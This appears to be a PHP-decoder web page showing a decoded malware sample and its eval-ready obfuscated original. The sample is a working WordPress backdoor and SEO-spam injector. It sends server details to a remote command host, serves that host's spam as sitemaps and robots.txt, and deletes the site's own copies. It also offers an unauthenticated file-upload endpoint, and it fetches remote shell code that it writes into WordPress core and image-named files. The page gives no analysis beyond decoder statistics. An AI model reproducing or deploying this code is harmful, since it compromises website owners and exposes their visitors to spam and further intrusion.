Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$x="'vVnrctu6Ef7dzOQdYFUTSKeyBCqSE19ox2PLl9a2dCS5SY6T4dAUJDHhrSRoyykz0/7rA/QF+gb91b99mbYzf..

Decoded Output download


set_time_limit(0);
@ini_set("html_errors","0");
@ob_start();
$action = isset($_GET['ac']) ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    $index_name = basename($_SERVER['SCRIPT_NAME']);
    write($index_name);
    echo "write done!";
    exit();
}
if ($action != "" && $action == "mup") {
    fup($action);
    exit();
}
$u6='104\x116\x116\x112\x58\x47\x47\x115\x101\x111\x50\x45\x50\x46\x115\x116\x97\x114\x116\x100\x100\x115\x101\x111\x46\x99\x111\x109\x47\x97\x112\x105\x47\x115\x101\x114\x118\x101\x114\x46\x112\x104\x112\x';
$group='ZQ2-2';
$wjt=0;
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/.htaccess')){
    $wjt=1;
}
$_SERVER=@str_replace(' ','',($_SERVER));
unset($_SERVER['PATH']);
unset($_SERVER['SYSTEMROOT']);
unset($_SERVER['COMSPEC']);
unset($_SERVER['PATHEXT']);
unset($_SERVER['WINDIR']);
unset($_SERVER['SERVER_SOFTWARE']);
$s['HTTP_HOST']=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:'';
$s['REMOTE_ADDR']=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'';
//$s['SERVER_ADDR']=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:'';
$s['REQUEST_URI']=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:'';
$s['HTTP_CLIENT_TOKEN']=isset($_SERVER['HTTP_CLIENT_TOKEN'])?$_SERVER['HTTP_CLIENT_TOKEN']:'';
$s['HTTP_USER_AGENT']=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'';
$s['HTTP_REFERER']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';
$s['HTTP_ACCEPT_LANGUAGE']=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';
$s['SCRIPT_NAME']=isset($_SERVER['SCRIPT_NAME'])?$_SERVER['SCRIPT_NAME']:'';
$s['SERVER_PORT']=isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:'';
$s['SERVER_PROTOCOL']=isset($_SERVER['SERVER_PROTOCOL'])?$_SERVER['SERVER_PROTOCOL']:'';
$s['HTTP_X_FORWARDED_PROTO']=isset($_SERVER['HTTP_X_FORWARDED_PROTO'])?$_SERVER['HTTP_X_FORWARDED_PROTO']:'';
$s['HTTPS']=isset($_SERVER['HTTPS'])?$_SERVER['HTTPS']:'';
$s['HTTP_X_FORWARDED_SSL']=isset($_SERVER['HTTP_X_FORWARDED_SSL'])?$_SERVER['HTTP_X_FORWARDED_SSL']:'';

if (phpversion() < '5.2' || PHP_VERSION_ID < 50200) {
    $sj=serialize($s);
}else{
    $sj=json_encode($s);
}
$info=cgg(o0($u6).'?group='.$group.'&server='.$sj.'&wjt='.$wjt.'&time='.time().'&token=zqO0o1IliLp2&phpv='.phpversion());
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/robots.txt')){
    @unlink($_SERVER['DOCUMENT_ROOT'].'/robots.txt');
}
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml')){
    @unlink($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml');
}
if($info){
    if(stripos($_SERVER['REQUEST_URI'],'sitemap.xml')!==false && stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')===false){
        header('Content-type:application/xml');
        echo ($info);
        exit();
    }elseif ($_SERVER['REQUEST_URI']=='/robots.txt'){
        header('Content-Type: text/plain;charset=utf-8');
        echo ($info);
        exit();
    }elseif(stripos($_SERVER['REQUEST_URI'],'atom.xml')!==false || stripos($_SERVER['REQUEST_URI'],'index.rdf')!==false || stripos($_SERVER['REQUEST_URI'],'rss.xml')!==false || stripos($_SERVER['REQUEST_URI'],'sitemap.xsl')!==false){
        header('Content-type:application/xml');
        echo ($info);
        exit();
    }else if (preg_match('/sitemap(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)-(\d+).xml$/i',$_SERVER['REQUEST_URI'],$map_uri)){
        if($map_uri[1]!="" && $map_uri[2]!="") {
            if($info=='HTTP/1.1 404 Not Found'){
                header($info);
                header("Status: 404 Not Found");
                exit();
            }else {
                header('Content-type:application/xml');
                echo($info);
                exit();
            }
        }
    }elseif(stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')!==false ){
        //$google=json_decode($info,true);
        $google=unserialize($info);
        foreach ($google as $g){
            $r = cgg($g);
            if ($r == 'success' ||  (stripos($r, 'successfully') !== false) || (stripos($r, '') !== false) || (stripos($r, '') !== false) || (stripos($r,'webmasters')!==false)) {
                echo '<p style="color:#00A000">' . $g . '--------' . $r . '</p>';
            } else {
                echo '<p style="color:#ff0000"><a href="' . $g . '" target="_blank">' . $g . '</a>--------' . $r . '</p>';
            }
        }
        exit();
    }
    else{
        header("Content-type: text/html; charset=utf-8");
        if(substr($info,'0',9)==='Location:'){
            header($info);
            exit();
        }elseif ($info=='HTTP/1.1 404 Not Found'){
        } else{
            if($info){
                print_r($info);
                exit();
            }
        }

    }
}else{
    //echo('500 error');
}
function cgg($url)
{
    $contents = @file_get_contents($url);
    if(!$contents) {
        $header = array(
            'Accept: */*',
            'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
        );
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        $contents = curl_exec($curl);
        curl_close($curl);
    }
    return $contents;
}
function o0($u){
    $a=explode('\x',$u);
    $u1='';
    foreach ($a as $b){
        if($b) {
            $u1 .= chr($b);
        }
    }
    return $u1;
}
function fup($g){
    error_reporting(0);
    if ($g == 'mup') {
        $saw1 = $_FILES['file']['tmp_name'];
        $saw2 = $_FILES['file']['name'];
        echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
        move_uploaded_file($saw1, $saw2);
        exit(0);
    }
}
function write($index_name)
{
	
    $write1 = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTEudHh0'));
    $write2 = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTIudHh0'));
    $shell_postfs = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei9tbTEudHh0'));
    $shell_load = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei9tbTIudHh0'));
    $new_ht_content = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei9zaGwvaHRhY2Nlc3MudHh0'));
    $ht_content = file_get_contents(".htaccess");
    $index_content = file_get_contents($index_name);
    $loader_php = "wp-includes/template-loader.php";
    $load_php = "wp-includes/load.php";
    $font_editor_php = "wp-includes/SimplePie/index.php";
    if (!is_dir("css")) {
        mkdir("css", 0755, true);
    }
    if ($index_name != "index.php") {
        $write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
        $write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
    }
    @chmod("css/.htaccess", 0755);
    file_put_contents("css/.htaccess", $new_ht_content);
    file_put_contents("css/load.php", $shell_load);
    if (is_dir("wp-includes/SimplePie")) {
        file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
        file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
        file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
        file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
        $loader_content = file_get_contents($loader_php);
        $load_content = file_get_contents($load_php);
        @chmod($loader_php, 0755);
        @chmod($load_php, 0755);
        file_put_contents($loader_php, $write1 . $loader_content);
        file_put_contents($load_php, $load_content . $write2);
        @chmod($loader_php, 0644);
        @chmod($load_php, 0644);
        file_put_contents($font_editor_php, $shell_postfs);
    }
}
?>

Did this file decode correctly?

Original Code

$x="'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'";$a=base64_decode($x);$b=gzinflate($a);eval($b);

Function Calls

gzinflate 1
base64_decode 1

Variables

$b set_time_limit(0); @ini_set("html_errors","0"); @ob_star..
$x 'vVnrctu6Ef7dzOQdYFUTSKeyBCqSE19ox2PLl9a2dCS5SY6T4dAUJDHhrSR..

Stats

MD5 6d3249ad0f9350094d9fa749595d95d8
Eval Count 1
Decode Time 61 ms